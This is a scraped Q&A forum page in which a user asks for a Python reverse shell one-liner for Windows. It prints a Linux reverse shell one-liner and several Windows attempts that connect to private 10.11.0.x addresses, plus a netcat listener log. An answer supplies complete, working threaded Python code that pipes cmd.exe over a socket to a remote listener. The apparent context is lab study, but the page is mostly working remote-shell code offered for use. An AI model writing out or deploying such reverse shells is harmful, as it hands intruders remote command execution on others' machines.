Python windows reverse shell one liner

python shellcode
rockstar picture rockstar · Jun 23, 2016 · Viewed 14.9k times · Source

Can anyone help me on a Python reverse shell one-liner for Windows (has to be windows one-liner).

I am trying to modify the one for Linux which I have used many times but this is my first time for Windows.

Linux one liner : 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Taken from Reverse Shell Cheat Sheet.

So here is what I have been able to do so far: 

C:\Python26\python.exe -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.11.0.232',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['C:\\WINDOWS\\system32\\cmd.exe','-i']);"

Well, the thing is I do get a connection back just that the shell dies. Anyone knows how to fix this or offer some suggestions?

nc -lvnp 443
listening on [any] 443 ...
connect to [10.11.0.232] from (UNKNOWN) [10.11.1.31] 1036

So the parameter to subprocess call must be wrong. I can't seem to get it right.

The path to cmd.exe is correct. I can't see any corresponding parameter like -i in the cmd man page.

Can anyone point me in the correct direction, please?

EDIT: Tried without arguments to subprocess call but still the same result. The connection dies immediately.

C:\Python26\python.exe -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.11.0.232',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['C:\WINDOWS\system32\cmd.exe']);"

Answer

Mark E. Haase picture Mark E. Haase · Sep 25, 2016

(@rockstar: I think you and I are studying the same thing!)

Not a one liner, but learning from David Cullen's answer, I put together this reverse shell for Windows.

import os,socket,subprocess,threading;
def s2p(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)
            p.stdin.flush()

def p2s(s, p):
    while True:
        s.send(p.stdout.read(1))

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.0.37",4444))

p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()

If anybody can condense this down to a single line, please feel free to edit my post or adapt this into your own answer...

Related questions

How do I list all files of a directory?

How can I list all files of a directory in Python and add them to a list?

Read More
Iterating over dictionaries using 'for' loops

I am a bit puzzled by the following code: d = {'x': 1, 'y': 2, 'z': 3} for key in d: print key, 'corresponds to', d[key] What I don't understand is the key portion. How does Python recognize that it needs only to …

Read More
Does Python have a string 'contains' substring method?

I'm looking for a string.contains or string.indexof method in Python. I want to do: if not somestring.contains("blah"): continue

Read More